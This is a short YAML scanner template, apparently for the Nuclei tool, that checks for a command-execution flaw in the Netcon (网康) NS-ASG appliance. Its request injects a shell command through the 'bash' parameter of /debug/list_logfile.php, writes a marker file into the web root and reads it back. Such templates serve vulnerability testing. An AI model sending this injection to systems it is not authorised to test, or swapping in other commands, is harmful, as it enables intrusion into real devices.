id: wangkang-NS-ASG-rce

info:
  name: 网康 NS-ASG 命令执行漏洞
  author: Str1am
  severity: high
  tags: NS-ASG,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/debug/list_logfile.php?action=restartservice&bash=;echo 202cb962ac59075b964b07152d234b70 >/Isc/third-party/httpd/htdocs/test.txt;"
      - "{{BaseURL}}/test.txt"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and
